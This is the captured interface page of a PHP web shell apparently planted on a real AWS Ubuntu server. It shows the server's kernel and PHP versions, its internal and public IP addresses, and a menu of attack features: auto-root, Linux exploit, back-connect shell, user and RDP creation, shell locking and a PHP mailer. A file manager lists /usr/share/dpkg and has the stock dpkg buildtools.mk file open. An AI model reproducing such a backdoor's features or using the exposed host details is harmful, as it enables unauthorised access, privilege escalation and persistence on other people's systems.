Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.141.193.237
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
dpkg /
[ HOME SHELL ]
Name
Size
Permission
Action
abitable
362
B
-rw-r--r--
architecture.mk
614
B
-rw-r--r--
buildflags.mk
1.55
KB
-rw-r--r--
buildtools.mk
1.74
KB
-rw-r--r--
cputable
1.92
KB
-rw-r--r--
default.mk
271
B
-rw-r--r--
no-pie-compile.specs
77
B
-rw-r--r--
no-pie-link.specs
65
B
-rw-r--r--
ostable
1.95
KB
-rw-r--r--
pie-compile.specs
97
B
-rw-r--r--
pie-link.specs
76
B
-rw-r--r--
pkg-info.mk
1.47
KB
-rw-r--r--
tupletable
1.33
KB
-rw-r--r--
vendor.mk
803
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : buildtools.mk
# This Makefile snippet defines the following variables for host tools: # # CPP: C preprocessor # CC: C compiler # CXX: C++ compiler # OBJC: Objective C compiler # OBJCXX: Objective C++ compiler # GCJ: GNU Java compiler # F77: Fortran 77 compiler # FC: Fortran 9x compiler # LD: linker # PKG_CONFIG: pkg-config tool # # All the above variables have a counterpart variable for the build tool, # as in CC → CC_FOR_BUILD. # # The variables are not exported by default. This can be changed by # defining DPKG_EXPORT_BUILDTOOLS. dpkg_datadir = /usr/share/dpkg include $(dpkg_datadir)/architecture.mk # We set the TOOL_FOR_BUILD variables to the specified value, and the TOOL # variables (for the host) to the their triplet-prefixed form iff they are # not defined or contain the make built-in defaults. On native builds if # TOOL is defined and TOOL_FOR_BUILD is not, we fallback to use TOOL. define dpkg_buildtool_setvar ifeq ($(origin $(1)),default) $(1) = $(DEB_HOST_GNU_TYPE)-$(2) endif $(1) ?= $(DEB_HOST_GNU_TYPE)-$(2) # On native build fallback to use TOOL if that's defined. ifeq ($(DEB_BUILD_GNU_TYPE),$(DEB_HOST_GNU_TYPE)) ifdef $(1) $(1)_FOR_BUILD ?= $$($(1)) endif endif $(1)_FOR_BUILD ?= $(DEB_BUILD_GNU_TYPE)-$(2) ifdef DPKG_EXPORT_BUILDTOOLS export $(1) export $(1)_FOR_BUILD endif endef $(eval $(call dpkg_buildtool_setvar,CPP,gcc -E)) $(eval $(call dpkg_buildtool_setvar,CC,gcc)) $(eval $(call dpkg_buildtool_setvar,CXX,g++)) $(eval $(call dpkg_buildtool_setvar,OBJC,gcc)) $(eval $(call dpkg_buildtool_setvar,OBJCXX,g++)) $(eval $(call dpkg_buildtool_setvar,GCJ,gcj)) $(eval $(call dpkg_buildtool_setvar,F77,f77)) $(eval $(call dpkg_buildtool_setvar,FC,f77)) $(eval $(call dpkg_buildtool_setvar,LD,ld)) $(eval $(call dpkg_buildtool_setvar,PKG_CONFIG,pkg-config))
Close